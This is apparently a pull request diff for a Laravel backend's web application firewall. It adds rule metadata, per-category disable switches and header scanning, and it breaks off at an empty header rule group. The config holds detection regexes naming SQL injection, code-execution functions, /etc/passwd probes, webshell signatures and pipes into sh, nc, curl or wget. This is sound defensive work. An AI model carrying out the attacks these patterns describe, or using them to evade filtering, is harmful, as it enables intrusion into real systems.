### PR TITLE
feat(security): WAF 规则库元数据化、类别停用开关与 header 检测维度

### DIFF
--- a/backend/.env.example
+++ b/backend/.env.example
@@ -346,3 +346,6 @@ WAF_ENABLED=true
 WAF_OBSERVE_ONLY=false
 # 命中后写 warning 日志（只含规则名/路径/IP，不含载荷）
 WAF_LOG_HITS=true
+# 按类别停用规则（逗号分隔，取值 sqli/rce/lfi/webshell/scanner/infoleak/cmdi）。
+# 某类规则误伤时的运营级灰度开关：只停该类，无需全局关 WAF。留空=全部生效。
+WAF_DISABLED_CATEGORIES=

--- a/backend/app/Http/Middleware/WebApplicationFirewall.php
+++ b/backend/app/Http/Middleware/WebApplicationFirewall.php
@@ -5,7 +5,7 @@ declare(strict_types=1);
 namespace App\Http\Middleware;
 
 use App\Support\ApiResponseBuilder;
-use App\Support\Waf\Firewall;
+use App\Support\Waf\PayloadScanner;
 use App\Support\Waf\KeySanitizer;
 use Closure;
 use Illuminate\Http\Request;
@@ -15,10 +15,9 @@ use Symfony\Component\HttpFoundation\Response;
 /**
  * 入站 WAF 中间件 —— 所有 API 请求的统一前置过滤入口。
  *
- * 参照异次元发卡（acg-faka）`App\Interceptor\Waf` 的位置与职责：在请求进入业务
- * 逻辑之前统一处理，避免防护补丁散落到各个控制器。差异在于本项目用 Laravel 中间件
- * 挂在 api 组，而非其注解式逐控制器声明——TuraIdc 的接口全部收敛在 api 组，统一
- * 挂载覆盖面更完整，也不会因为新增控制器时忘记加注解而漏防。
+ * 挂载于 api 中间件组最前：TuraIdc 的接口全部收敛在 api 组，统一挂载覆盖面
+ * 完整，防护在请求进入业务逻辑之前就生效，也不会因为新增控制器时忘记声明
+ * 而漏防——防护补丁散落到各个控制器的路线本仓库不走。
  *
  * 分两层，顺序不可颠倒：
  *
@@ -28,13 +27,13 @@ use Symfony\Component\HttpFoundation\Response;
  *     放在检测之前，避免带脏键的请求进入规则匹配消耗资源。
  *  L2 规则检测（只拒绝、不改写）：命中攻击特征即拒绝，返回 40009。
  *     超长、超深、无效编码等无法完整检查的情形由引擎按 fatal_rules 固定规则
- *     拒绝（fail-closed），详见 Firewall。
+ *     拒绝（fail-closed），详见 PayloadScanner。
  *
- * ⚠ 为什么**不**做全局的「值」净化（这是与 acg-faka 最重要的分歧）：
+ * ⚠ 为什么**不**做全局的「值」净化（这是与"入站改写一切"路线最根本的分歧）：
  *
- * acg-faka 在 `Kernel\Context\Abstract\Request::__construct()` 里对
- * $_POST/$_GET/$_REQUEST/$_SERVER/json 全部跑 xssKiller 改写。这套在 TuraIdc
- * 上会直接造成资金级事故，因为本项目有四类**绝不能被改写**的入参：
+ * "入站改写一切"路线会把 $_POST/$_GET/$_REQUEST/$_SERVER/json 全部改写一遍。
+ * 这条路线在 TuraIdc 上会直接造成资金级事故，因为本项目有四类**绝不能被改写**
+ * 的入参：
  *
  *  1. **支付回调验签**：VerifyAlipayCallbackSignature 用 `$request->all()` 参与
  *     验签，改写任意一个字节都会导致验签失败——收不到钱。
@@ -53,7 +52,7 @@ use Symfony\Component\HttpFoundation\Response;
 class WebApplicationFirewall
 {
     public function __construct(
-        private readonly Firewall $firewall,
+        private readonly PayloadScanner $scanner,
         private readonly KeySanitizer $keySanitizer,
     ) {}
 
@@ -84,7 +83,7 @@ class WebApplicationFirewall
             return ApiResponseBuilder::error(40009, '请求包含不安全的内容，已被拦截', null, 400);
         }
 
-        $hit = $this->firewall->inspect($request);
+        $hit = $this->scanner->inspect($request);
 
         if ($hit === null) {
             return $next($request);
@@ -145,6 +144,9 @@ class WebApplicationFirewall
         Log::warning('WAF 拦截到可疑请求', [
             'rule_group' => $hit['group'],
             'rule_name' => $hit['name'],
+            'rule_id' => $hit['id'] ?? null,
+            'rule_category' => $hit['category'] ?? null,
+            'rule_severity' => $hit['severity'] ?? null,
             'method' => $request->method(),
             'path' => $request->getPathInfo(),
             'ip' => $request->ip(),

--- a/backend/app/Providers/AppServiceProvider.php
+++ b/backend/app/Providers/AppServiceProvider.php
@@ -17,7 +17,7 @@ use App\Services\ProductCatalog\ProductDisplayNameResolver;
 use App\Services\ProductCatalog\ProductSpecHighlightService;
 use App\Services\System\UploadedAssetReferenceService;
 use App\Support\DatabaseSchema;
-use App\Support\Waf\Firewall;
+use App\Support\Waf\PayloadScanner;
 use Carbon\CarbonInterface;
 use Illuminate\Cache\RateLimiting\Limit;
 use Illuminate\Database\Events\MigrationsEnded;
@@ -80,8 +80,8 @@ class AppServiceProvider extends ServiceProvider
         // WAF 引擎：规则库与限额从配置注入而非在类内读 config()，这样引擎既可
         // 单测也可在别处复用。singleton 让配置只解析一次，避免每个请求重复拷贝。
         $this->app->singleton(
-            Firewall::class,
-            static fn ($app): Firewall => new Firewall((array) $app['config']->get('waf', []))
+            PayloadScanner::class,
+            static fn ($app): PayloadScanner => new PayloadScanner((array) $app['config']->get('waf', []))
         );
     }
 

--- a/backend/app/Support/Waf/KeySanitizer.php
+++ b/backend/app/Support/Waf/KeySanitizer.php
@@ -7,9 +7,9 @@ namespace App\Support\Waf;
 /**
  * 请求「键名」检测器 —— 识别数组键里的注入字符。
  *
- * 由来：异次元发卡（acg-faka）3.6.3 修复的一个 P0——其 WAF 历来只清洗数组的
- * **值**、不清洗**键**，攻击者遂把 PHP 代码/HTML 藏进键名，经配置写入器逃逸单引号
- * 造成配置文件 RCE，或经后台表格 innerHTML 渲染造成存储型 XSS。
+ * 由来：入站过滤的一个经典 P0——只清洗数组的**值**、不检查**键**，攻击者
+ * 遂把 PHP 代码/HTML 藏进键名，经配置写入器逃逸单引号造成配置文件 RCE，
+ * 或经后台表格 innerHTML 渲染造成存储型 XSS。
  *
  * 本类只**检测**、绝不**改写**。早期版本会把脏键删字符后放行，但删字符是
  * 不可逆折叠：`amount<` 与 `amount` 会变成同一个键，`['amount' => '100',
@@ -33,7 +33,7 @@ final class KeySanitizer
      */
     private const FORBIDDEN = '/[\x00-\x1F\x7F<>"\'\\\\]/u';
 
-    /** 递归深度上限，防御畸形深层嵌套。与 Firewall 同口径。 */
+    /** 递归深度上限，防御畸形深层嵌套。与 PayloadScanner 同口径。 */
     private const MAX_DEPTH = 12;
 
     /**

--- a/backend/app/Support/Waf/PayloadScanner.php
+++ b/backend/app/Support/Waf/PayloadScanner.php
@@ -9,16 +9,16 @@ use Illuminate\Http\Request;
 /**
  * 入站请求规则匹配引擎。
  *
- * 参照异次元发卡（acg-faka）`Kernel\Waf\Firewall::check()` 的思路：把请求的各个
+ * 把请求的各个
  * 部位（查询串 / 路径 / 请求体 / Cookie / UA）拼成待检字符串，逐条过正则规则库，
  * 命中即返回，交由中间件决定拦截或仅记录。
  *
  * 与参照实现的三处关键差异：
  *
- * 1. **绝不二次 urldecode。** acg-faka 早期版本对已解码的输入再 `urldecode` 一次，
- *    导致用户字面输入的 `%20`/`%2B`/`%25` 被改写，卡密、查单密码等字段整体失真
- *    （其仓库 issue #833）。PHP/Laravel 在解析请求时已完成解码，这里只做
- *    `http_build_query` 重新拼接用于匹配，不再解码。
+ * 1. **绝不二次 urldecode。** 对已解码的输入再 `urldecode` 一次会把用户字面
+ *    输入的 `%20`/`%2B`/`%25` 改写，卡密、查单密码等字段会整体失真——同类
+ *    入站过滤层踩过的真实事故形态。PHP/Laravel 在解析请求时已完成解码，这里
+ *    只做 `http_build_query` 重新拼接用于匹配，不再解码。
  *
  * 2. **超长载荷分块覆盖，绝不截断丢弃。** 截断看似防住了正则回溯 DoS，实则给
  *    攻击者留了"把载荷放在截断点之后"的免检区。这里按块扫描全部字节，块间
@@ -32,7 +32,7 @@ use Illuminate\Http\Request;
  * 本类只读不改。输入净化由 RichHtmlSanitizer / TextSanitizer 在各自的语义位置
  * 负责，职责不混。
  */
-class Firewall
+class PayloadScanner
 {
     private const DEFAULT_SCAN_BLOCK_SIZE = 20000;
 
@@ -66,6 +66,12 @@ class Firewall
         ));
         $this->maxDepth = max(1, (int) ($limits['max_depth'] ?? self::DEFAULT_MAX_DEPTH));
 
+        // 类别停用：逗号分隔字符串，小写归一；未配置时为空集（全部类别生效）。
+        $this->disabledCategories = array_values(array_filter(array_map(
+            static fn (string $c): string => strtolower(trim($c)),
+            explode(',', (string) ($resolved['disabled_categories'] ?? '')),
+        )));
+
         $fatal = (array) ($resolved['fatal_rules'] ?? []);
         $this->fatalRules = [
             'depth_exceeded' => (string) ($fatal['depth_exceeded'] ?? '嵌套层级超限'),
@@ -80,7 +86,7 @@ class Firewall
      * 既无法在不启动应用的情况下单测，也无法在别处（如 CLI 校验工具）复用。
      * 容器绑定见 AppServiceProvider，中间件拿到的实例已注入 config('waf')。
      *
-     * @var array<string, list<array{name?: string, pattern?: string}>>
+     * @var array<string, list<array{name?: string, pattern?: string, id?: string, category?: string, enable?: bool}>>
      */
     private array $rules;
 
@@ -89,6 +95,9 @@ class Firewall
     private int $scanBlockOverlap;
 
     private int $maxDepth;
+
+    /** @var list<string> 被停用的规则类别（小写）；命中类别的规则整体跳过。 */
+    private array $disabledCategories = [];
 
     /** @var array<string, string> */
     private array $fatalRules;
@@ -125,7 +134,13 @@ class Firewall
 
             $hit = $this->matchChunks((array) $this->rules[$group], $subject);
             if ($hit !== null) {
-                return ['group' => $group, 'name' => $hit];
+                return [
+                    'group' => $group,
+                    'name' => (string) ($hit['name'] ?? 'unnamed'),
+                    'id' => isset($hit['id']) ? (string) $hit['id'] : null,
+                    'category' => isset($hit['category']) ? (string) $hit['category'] : null,
+                    'severity' => isset($hit['severity']) ? (string) $hit['severity'] : null,
+                ];
             }
         }
 
@@ -136,6 +151,8 @@ class Firewall
      * 组装各检测部位的待检字符串。
      *
      * 顺序即检测优先级：路径与查询串成本最低且最常命中，放在前面短路。
+     * header 是独立检测维度：攻击载荷可藏在 X-Forwarded-For、Referer 或任意
+     * 自定义头里进入日志与下游解析；cookie 与 UA 单列，不重复进 header。
      *
      * @return array<string, string>
      */
@@ -146,8 +163,22 @@ class Firewall
             'query' => $this->flatten($request->query()),
             'body' => $this->flatten($this->bodyInput($request)),
             'cookie' => $this->flatten($request->cookies->all()),
+            'header' => $this->flatten($this->headerInput($request)),
             'ua' => (string) $request->userAgent(),
         ];
+    }
+
+    /**
+     * 取参与匹配的请求头（排除已单列的 cookie 与 UA）。
+     *
+     * @return array<array-key, mixed>
+     */
+    private function headerInput(Request $request): array
+    {
+        return array_diff_key($request->headers->all(), [
+            'cookie' => true,
+            'user-agent' => true,
+        ]);
     }
 
     /**
@@ -225,9 +256,12 @@ class Firewall
     /**
      * 在一组规则内匹配，超长主体分块覆盖全部字节。
      *
-     * @param  list<array{name?: string, pattern?: string}>  $rules
+     * 单条 `enable => false` 与 `disabled_categories` 命中的规则在此过滤：
+     * 停用属于运营变更（配置里必须有据可查），引擎只按配置放行。
+     *
+     * @param  list<array{name?: string, pattern?: string, id?: string, category?: string, enable?: bool}>  $rules
      */
-    private function matchChunks(array $rules, string $subject): ?string
+    private function matchChunks(array $rules, string $subject): ?array
     {
         if (strlen($subject) <= $this->scanBlockSize) {
             return $this->matchGroup($rules, $subject);
@@ -283,13 +317,24 @@ class Firewall
     }
 
     /**
-     * 在一组规则内匹配，返回命中的规则名。
+     * 在一组规则内匹配，返回命中的规则条目（供命中结果携带 id/category）。
      *
-     * @param  list<array{name?: string, pattern?: string}>  $rules
+     * @param  list<array{name?: string, pattern?: string, id?: string, category?: string, enable?: bool}>  $rules
+     * @return array{name?: string, pattern?: string, id?: string, category?: string}|null
      */
-    private function matchGroup(array $rules, string $subject): ?string
+    private function matchGroup(array $rules, string $subject): ?array
     {
         foreach ($rules as $rule) {
+            // 单条停用与类别停用在此过滤：停用规则不参与匹配。
+            if (($rule['enable'] ?? true) === false) {
+                continue;
+            }
+
+            if ($this->disabledCategories !== []
+                && in_array(strtolower((string) ($rule['category'] ?? '')), $this->disabledCategories, true)) {
+                continue;
+            }
+
             $pattern = (string) ($rule['pattern'] ?? '');
             if ($pattern === '') {
                 continue;
@@ -300,7 +345,7 @@ class Firewall
             // preg_match 返回 false 时视为未命中并继续下一条（编码合法性
             // 已在 inspect() 层校验，这里 false 只可能来自规则本身畸形）。
             if (@preg_match('#'.$pattern.'#iu', $subject) === 1) {
-                return (string) ($rule['name'] ?? 'unnamed');
+                return $rule;
             }
         }
 

--- a/backend/config/waf.php
+++ b/backend/config/waf.php
@@ -7,7 +7,7 @@ declare(strict_types=1);
 | 入站 WAF（Web 应用防火墙）
 |--------------------------------------------------------------------------
 |
-| 参照异次元发卡（acg-faka）的 Firewall 结构落地：用正则规则库在请求进入业务
+| 入站载荷扫描层：用正则规则库在请求进入业务
 | 逻辑之前拦截明显的攻击载荷（SQL 注入、命令执行、目录穿越、扫描器探测）。
 |
 | 定位说明——本层是**纵深防御的外层**，不是唯一防线，也不能替代：
@@ -17,13 +17,25 @@ declare(strict_types=1);
 | 正则黑名单天然可被绕过，它的价值在于挡掉自动化扫描与批量探测，降低噪音与
 | 被踩到未知漏洞的概率，而不是当作"有它就安全了"。
 |
-| 与 acg-faka 规则库的差异（有意为之）：
+| 与常见通用规则库的差异（有意为之）：
 |   - 剔除 ThinkPHP payload（invokefunction / call_user_func_array / \think\）
 |     与 Smarty SSTI 规则：本项目是 Laravel + 无模板注入面，留着只会误伤正常参数。
 |   - 剔除 XSS 标签/事件属性规则：富文本字段（文章正文、工单内容）合法包含 HTML，
 |     在入站层拦 `<div` 会直接打断业务；XSS 交给 RichHtmlSanitizer 白名单净化。
 |   - 放宽部分过于宽泛的 SQL 函数名规则（如裸 `substr(` / `user(`）：这类词在
 |     正常文本里出现概率高，误伤代价大于收益。
+|
+| 按我们的威胁模型对通用 WAF 能力做的取舍（有意不做的部分与理由）：
+|   - 做了：按攻击类别停用的运营开关（disabled_categories）、规则元数据
+|     （id/category/severity，为将来 N-day/CVE 订阅规则预留 schema）。
+|   - 不做：变换链多层解码（url_decode×2/base64 试探/多层嵌套变换）——我们
+|     的威胁模型是"挡自动化扫描与批量探测"，逐值多轮解码会破坏合法 % 序列
+|     （WafPayloadScannerTest::test_does_not_double_decode_percent_sequences 是
+|     有意取舍）；Java/SSTI/XSS 入站规则（我们是 Laravel/Blade，无对应注入
+|     面，XSS 交给 RichHtmlSanitizer）；CC 组合 DSL 与 JA4/TLS 指纹（边缘
+|     CDN 的对抗维度，计费系统不需要）；multipart 内容扫描（我们上传走
+|     UploadedFile 白名单校验）。检测实现不依赖任何外部库——规则即配置，
+|     引擎即数百行 PHP，全部走代码评审与回归测试。
 |
 */
 
@@ -45,6 +57,33 @@ return [
 
     // 命中后是否写 warning 日志（含规则名、路径、IP，不记录完整载荷以免日志膨胀/泄敏）
     'log_hits' => env('WAF_LOG_HITS', true),
+
+    /*
+    |--------------------------------------------------------------------------
+    | 规则库元数据
+    |--------------------------------------------------------------------------
+    |
+    | version：规则库自身的语义化版本。规则条目的增删改必须递增，供运维核对
+    | "线上跑的是哪一版规则"。N-day/CVE 类订阅规则若未来引入，同样在此登记
+    | 订阅版本（如 "nday-2026.09"）。
+    |
+    */
+    'meta' => [
+        'version' => '1.1.0',
+        'updated_at' => '2026-09-06',
+    ],
+
+    /*
+    |--------------------------------------------------------------------------
+    | 按类别停用（运营级灰度开关）
+    |--------------------------------------------------------------------------
+    |
+    | category ∈ sqli | rce | lfi | webshell | scanner | infoleak | cmdi。
+    | 某类规则误伤时的运营级灰度开关：只停用该类，不必全局关 WAF，也不必
+    | 逐条加豁免。值的解析与小写归一由 PayloadScanner 负责。
+    |
+    */
+    'disabled_categories' => env('WAF_DISABLED_CATEGORIES', ''),
 
     /*
     |--------------------------------------------------------------------------
@@ -122,7 +161,19 @@ return [
     | 规则库
     |--------------------------------------------------------------------------
     |
-    | 每条规则：['name' => 规则名, 'pattern' => 正则（不含分隔符，运行时以 # 包裹并加 i 修饰）]
+    | 每条规则的字段：
+    |   id       稳定标识（{category}-{描述}），用于日志检索与将来的按规则豁免；
+    |            一经发布不得改名，只能废弃（enable=false）或以新 id 替代。
+    |   name     中文名（日志与响应里呈现）。
+    |   pattern  正则（不含分隔符，运行时以 # 包裹并加 i 修饰）。
+    |   category sqli | rce | lfi | webshell | scanner | infoleak，
+    |            对应 disabled_categories 的停用粒度。
+    |   severity critical | high | medium | low（情报性质，供日志分级与盘点）。
+    |   enable   可选，默认 true。置 false 表示该规则停用——停用属于运营变更，
+    |            必须在 git 提交说明里写明误伤证据，禁止无记录地关闭规则。
+    |   cve / references  可选，N-day/CVE 规则的元数据预留（cve 如 "CVE-2024-4577"，
+    |            references 为参考链接数组）。当前规则库为通用特征，暂未使用；
+    |            引入订阅型 CVE 规则时按此字段登记，schema 无需再变更。
     | 分组对应检测目标：query（GET 参数）、path（URI 路径）、body（POST 等请求体）、
     | cookie（Cookie 值）、ua（User-Agent）。
     |
@@ -131,59 +182,88 @@ return [
 
         // ---- GET 查询串 ----
         'query' => [
-            ['name' => '目录穿越', 'pattern' => '\.\./\.\./'],
-            ['name' => '敏感文件探测', 'pattern' => '(?:etc/\W*passwd|/proc/self/environ)'],
-            ['name' => 'PHP 流协议', 'pattern' => '(gopher|phar|zlib|dict|expect|input)://'],
-            ['name' => '代码执行函数', 'pattern' => '\b(?:eval|assert|shell_exec|passthru|proc_open|popen|base64_decode)\s*\('],
-            ['name' => '超全局变量探测', 'pattern' => '\$_(?:GET|POST|COOKIE|FILES|SESSION|ENV|SERVER|REQUEST)\['],
-            ['name' => 'SQL 联合注入', 'pattern' => 'union[\s/*]+select'],
-            ['name' => 'SQL 布尔注入', 'pattern' => '\s+(?:or|xor|and)\s+[\w\'"`]+\s*(?:=|<|>|like)'],
-            ['name' => 'SQL 时间盲注', 'pattern' => '\b(?:sleep|benchmark|pg_sleep|waitfor\s+delay)\s*\('],
-            ['name' => 'SQL 元数据探测', 'pattern' => 'from\W+information_schema\W'],
-            ['name' => 'SQL 文件写入', 'pattern' => 'into\s+(?:dump|out)file'],
-            ['name' => 'SQL 报错注入', 'pattern' => '\b(?:extractvalue|updatexml|geometrycollection|multipolygon|linestring)\s*\('],
-            ['name' => 'SQL 读文件', 'pattern' => '\b(?:load_file|@@version|@@datadir)\b'],
-            ['name' => '中国菜刀特征', 'pattern' => 'array_map\s*\(\s*["\']ass'],
+            ['id' => 'lfi-path-traversal', 'name' => '目录穿越', 'pattern' => '\.\./\.\./', 'category' => 'lfi', 'severity' => 'high'],
+            ['id' => 'lfi-probe-passwd', 'name' => '敏感文件探测', 'pattern' => '(?:etc/\W*passwd|/proc/self/environ)', 'category' => 'lfi', 'severity' => 'critical'],
+            ['id' => 'rce-stream-protocol', 'name' => 'PHP 流协议', 'pattern' => '(gopher|phar|zlib|dict|expect|input)://', 'category' => 'rce', 'severity' => 'critical'],
+            ['id' => 'rce-code-func', 'name' => '代码执行函数', 'pattern' => '\b(?:eval|assert|shell_exec|passthru|proc_open|popen|base64_decode)\s*\(', 'category' => 'rce', 'severity' => 'critical'],
+            ['id' => 'rce-superglobal', 'name' => '超全局变量探测', 'pattern' => '\$_(?:GET|POST|COOKIE|FILES|SESSION|ENV|SERVER|REQUEST)\[', 'category' => 'rce', 'severity' => 'critical'],
+            ['id' => 'sqli-union-select', 'name' => 'SQL 联合注入', 'pattern' => 'union[\s/*]+select', 'category' => 'sqli', 'severity' => 'critical'],
+            ['id' => 'sqli-boolean', 'name' => 'SQL 布尔注入', 'pattern' => '\s+(?:or|xor|and)\s+[\w\'"`]+\s*(?:=|<|>|like)', 'category' => 'sqli', 'severity' => 'high'],
+            ['id' => 'sqli-time-based', 'name' => 'SQL 时间盲注', 'pattern' => '\b(?:sleep|benchmark|pg_sleep|waitfor\s+delay)\s*\(', 'category' => 'sqli', 'severity' => 'critical'],
+            ['id' => 'sqli-information-schema', 'name' => 'SQL 元数据探测', 'pattern' => 'from\W+information_schema\W', 'category' => 'sqli', 'severity' => 'critical'],
+            ['id' => 'sqli-into-outfile', 'name' => 'SQL 文件写入', 'pattern' => 'into\s+(?:dump|out)file', 'category' => 'sqli', 'severity' => 'critical'],
+            ['id' => 'sqli-error-based', 'name' => 'SQL 报错注入', 'pattern' => '\b(?:extractvalue|updatexml|geometrycollection|multipolygon|linestring)\s*\(', 'category' => 'sqli', 'severity' => 'critical'],
+            ['id' => 'sqli-file-read', 'name' => 'SQL 读文件', 'pattern' => '\b(?:load_file|@@version|@@datadir)\b', 'category' => 'sqli', 'severity' => 'critical'],
+            ['id' => 'webshell-chopper', 'name' => '中国菜刀特征', 'pattern' => 'array_map\s*\(\s*["\']ass', 'category' => 'webshell', 'severity' => 'critical'],
+            // 以下四条是规则库审计后的特征补强（业界通用 WAF 均覆盖，本库此前
+            // 缺位）：auto_prepend/append_file 是 php.ini 注入特征；MySQL 版本
+            // 注释（/*!5xxxx）是绕过 union 关键词匹配的经典混淆形态；管道执行
+            // 与 PHP 序列化对象（O:N:"）是低误伤、高特异的攻击指纹。
+            ['id' => 'rce-auto-prepend', 'name' => 'PHP 配置文件注入', 'pattern' => 'auto_(?:prepend|append)_file', 'category' => 'rce', 'severity' => 'high'],
+            ['id' => 'sqli-mysql-version-comment', 'name' => 'MySQL 版本注释', 'pattern' => '/\*!5\d{4}', 'category' => 'sqli', 'severity' => 'critical'],
+            ['id' => 'cmdi-pipe-exec', 'name' => '命令管道执行', 'pattern' => '\|\s*(?:sh|bash|nc|curl|wget)\b', 'category' => 'cmdi', 'severity' => 'critical'],
+            ['id' => 'rce-php-deser', 'name' => 'PHP 反序列化特征', 'pattern' => 'O:\d+:"', 'category' => 'rce', 'severity' => 'high'],
         ],
 
         // ---- URI 路径 ----
         'path' => [
-            ['name' => '敏感配置文件', 'pattern' => '\.(?:htaccess|user\.ini|bash_history|mysql_history|DS_Store)$'],
-            ['name' => '源码/备份文件', 'pattern' => '\.(?:bak|old|sql|swp|swo|inc|mdb|war|class)$'],
-            ['name' => '备份包探测', 'pattern' => '^/?(?:www|web|site|root|backup|data|db|wwwroot|vhost)\.(?:rar|zip|tar|tar\.gz|7z|sql)$'],
-            ['name' => 'WebShell 文件名', 'pattern' => '/(?:hack|shell|phpspy|webshell|cmd|c99|r57)\.(?:php|jsp|asp|aspx)$'],
-            ['name' => '上传目录脚本执行', 'pattern' => '^/?(?:uploads?|static|media|cache|attachments|avatar)/[^/]+\.(?:php|phtml|jsp|asp|aspx)$'],
-            ['name' => '版本控制目录泄露', 'pattern' => '/\.(?:git|svn|hg)/'],
-            ['name' => '环境文件泄露', 'pattern' => '/\.env(?:\.|$)'],
+            ['id' => 'infoleak-config-files', 'name' => '敏感配置文件', 'pattern' => '\.(?:htaccess|user\.ini|bash_history|mysql_history|DS_Store)$', 'category' => 'infoleak', 'severity' => 'medium'],
+            ['id' => 'infoleak-backup-files', 'name' => '源码/备份文件', 'pattern' => '\.(?:bak|old|sql|swp|swo|inc|mdb|war|class)$', 'category' => 'infoleak', 'severity' => 'medium'],
+            ['id' => 'scanner-backup-archives', 'name' => '备份包探测', 'pattern' => '^/?(?:www|web|site|root|backup|data|db|wwwroot|vhost)\.(?:rar|zip|tar|tar\.gz|7z|sql)$', 'category' => 'scanner', 'severity' => 'low'],
+            ['id' => 'webshell-filename', 'name' => 'WebShell 文件名', 'pattern' => '/(?:hack|shell|phpspy|webshell|cmd|c99|r57)\.(?:php|jsp|asp|aspx)$', 'category' => 'webshell', 'severity' => 'critical'],
+            ['id' => 'webshell-upload-dir', 'name' => '上传目录脚本执行', 'pattern' => '^/?(?:uploads?|static|media|cache|attachments|avatar)/[^/]+\.(?:php|phtml|jsp|asp|aspx)$', 'category' => 'webshell', 'severity' => 'critical'],
+            ['id' => 'infoleak-vcs-dir', 'name' => '版本控制目录泄露', 'pattern' => '/\.(?:git|svn|hg)/', 'category' => 'infoleak', 'severity' => 'medium'],
+            ['id' => 'infoleak-env-file', 'name' => '环境文件泄露', 'pattern' => '/\.env(?:\.|$)', 'category' => 'infoleak', 'severity' => 'critical'],
         ],
 
         // ---- 请求体 ----
         'body' => [
-            ['name' => '目录穿越', 'pattern' => '\.\./\.\./\.\./'],
-            ['name' => '敏感文件探测', 'pattern' => '(?:etc/\W*passwd|/proc/self/environ)'],
-            ['name' => 'PHP 流协议', 'pattern' => '(gopher|phar|zlib|dict|expect)://'],
-            ['name' => '代码执行函数', 'pattern' => '\b(?:eval|assert|shell_exec|passthru|proc_open|popen)\s*\('],
-            ['name' => 'SQL 联合注入', 'pattern' => 'union[\s/*]+select'],
-            ['name' => 'SQL 时间盲注', 'pattern' => '\b(?:sleep|benchmark|pg_sleep)\s*\(\s*\d'],
-            ['name' => 'SQL 元数据探测', 'pattern' => 'from\W+information_schema\W'],
-            ['name' => 'SQL 文件写入', 'pattern' => 'into\s+(?:dump|out)file'],
-            ['name' => 'SQL 报错注入', 'pattern' => '\b(?:extractvalue|updatexml)\s*\('],
-            ['name' => '中国菜刀特征', 'pattern' => 'array_map\s*\(\s*["\']ass'],
+            ['id' => 'lfi-path-traversal-body', 'name' => '目录穿越', 'pattern' => '\.\./\.\./\.\./', 'category' => 'lfi', 'severity' => 'high'],
+            ['id' => 'lfi-probe-passwd-body', 'name' => '敏感文件探测', 'pattern' => '(?:etc/\W*passwd|/proc/self/environ)', 'category' => 'lfi', 'severity' => 'critical'],
+            ['id' => 'rce-stream-protocol-body', 'name' => 'PHP 流协议', 'pattern' => '(gopher|phar|zlib|dict|expect)://', 'category' => 'rce', 'severity' => 'critical'],
+            ['id' => 'rce-code-func-body', 'name' => '代码执行函数', 'pattern' => '\b(?:eval|assert|shell_exec|passthru|proc_open|popen)\s*\(', 'category' => 'rce', 'severity' => 'critical'],
+            ['id' => 'sqli-union-select-body', 'name' => 'SQL 联合注入', 'pattern' => 'union[\s/*]+select', 'category' => 'sqli', 'severity' => 'critical'],
+            ['id' => 'sqli-time-based-body', 'name' => 'SQL 时间盲注', 'pattern' => '\b(?:sleep|benchmark|pg_sleep)\s*\(\s*\d', 'category' => 'sqli', 'severity' => 'critical'],
+            ['id' => 'sqli-information-schema-body', 'name' => 'SQL 元数据探测', 'pattern' => 'from\W+information_schema\W', 'category' => 'sqli', 'severity' => 'critical'],
+            ['id' => 'sqli-into-outfile-body', 'name' => 'SQL 文件写入', 'pattern' => 'into\s+(?:dump|out)file', 'category' => 'sqli', 'severity' => 'critical'],
+            ['id' => 'sqli-error-based-body', 'name' => 'SQL 报错注入', 'pattern' => '\b(?:extractvalue|updatexml)\s*\(', 'category' => 'sqli', 'severity' => 'critical'],
+            ['id' => 'webshell-chopper-body', 'name' => '中国菜刀特征', 'pattern' => 'array_map\s*\(\s*["\']ass', 'category' => 'webshell', 'severity' => 'critical'],
+            // 与 query 组同源的四类特征补强。
+            ['id' => 'rce-auto-prepend-body', 'name' => 'PHP 配置文件注入', 'pattern' => 'auto_(?:prepend|append)_file', 'category' => 'rce', 'severity' => 'high'],
+            ['id' => 'sqli-mysql-version-comment-body', 'name' => 'MySQL 版本注释', 'pattern' => '/\*!5\d{4}', 'category' => 'sqli', 'severity' => 'critical'],
+            ['id' => 'cmdi-pipe-exec-body', 'name' => '命令管道执行', 'pattern' => '\|\s*(?:sh|bash|nc|curl|wget)\b', 'category' => 'cmdi', 'severity' => 'critical'],
+            ['id' => 'rce-php-deser-body', 'name' => 'PHP 反序列化特征', 'pattern' => 'O:\d+:"', 'category' => 'rce', 'severity' => 'high'],
         ],
 
         // ---- Cookie ----
         'cookie' => [
-            ['name' => '代码执行函数', 'pattern' => '\b(?:eval|assert|shell_exec|passthru|base64_decode)\s*\('],
-            ['name' => '超全局变量探测', 'pattern' => '\$_(?:GET|POST|COOKIE|FILES|SESSION|ENV|SERVER)\['],
-            ['name' => 'SQL 联合注入', 'pattern' => 'union[\s/*]+select'],
-            ['name' => 'SQL 元数据探测', 'pattern' => 'from\W+information_schema\W'],
-            ['name' => 'PHP 流协议', 'pattern' => '(gopher|phar|zlib|dict)://'],
+            ['id' => 'rce-code-func-cookie', 'name' => '代码执行函数', 'pattern' => '\b(?:eval|assert|shell_exec|passthru|base64_decode)\s*\(', 'category' => 'rce', 'severity' => 'critical'],
+            ['id' => 'rce-superglobal-cookie', 'name' => '超全局变量探测', 'pattern' => '\$_(?:GET|POST|COOKIE|FILES|SESSION|ENV|SERVER)\[', 'category' => 'rce', 'severity' => 'critical'],
+            ['id' => 'sqli-union-select-cookie', 'name' => 'SQL 联合注入', 'pattern' => 'union[\s/*]+select', 'category' => 'sqli', 'severity' => 'critical'],
+            ['id' => 'sqli-information-schema-cookie', 'name' => 'SQL 元数据探测', 'pattern' => 'from\W+information_schema\W', 'category' => 'sqli', 'severity' => 'critical'],
+            ['id' => 'rce-stream-protocol-cookie', 'name' => 'PHP 流协议', 'pattern' => '(gopher|phar|zlib|dict)://', 'category' => 'rce', 'severity' => 'critical'],
         ],
 
         // ---- User-Agent ----
         'ua' => [
             // 只匹配自动化安全工具，不含正常浏览器/搜索引擎爬虫
-            ['name' => '扫描器探测', 'pattern' => '\b(?:sqlmap|nmap|nikto|havij|acunetix|netsparker|w3af|dirbuster|hydra|antSword|pangolin|zgrab|masscan|WPScan)\b'],
+            ['id' => 'scanner-tools', 'name' => '扫描器探测', 'pattern' => '\b(?:sqlmap|nmap|nikto|havij|acunetix|netsparker|w3af|dirbuster|hydra|antSword|pangolin|zgrab|masscan|WPScan)\b', 'category' => 'scanner', 'severity' => 'low'],
+        ],
+
+        // ---- 请求头（cookie 与 UA 已单列，此处扫描其余全部头）----
+        // 攻击载荷可藏在 X-Forwarded-For、Referer 或任意自定义头里进入日志与
+        // 下游解析。头值形态多为短 ASCII，只保留高特异规则，避免
+        // Accept-Language 等正常头误伤。
+        'header' => [
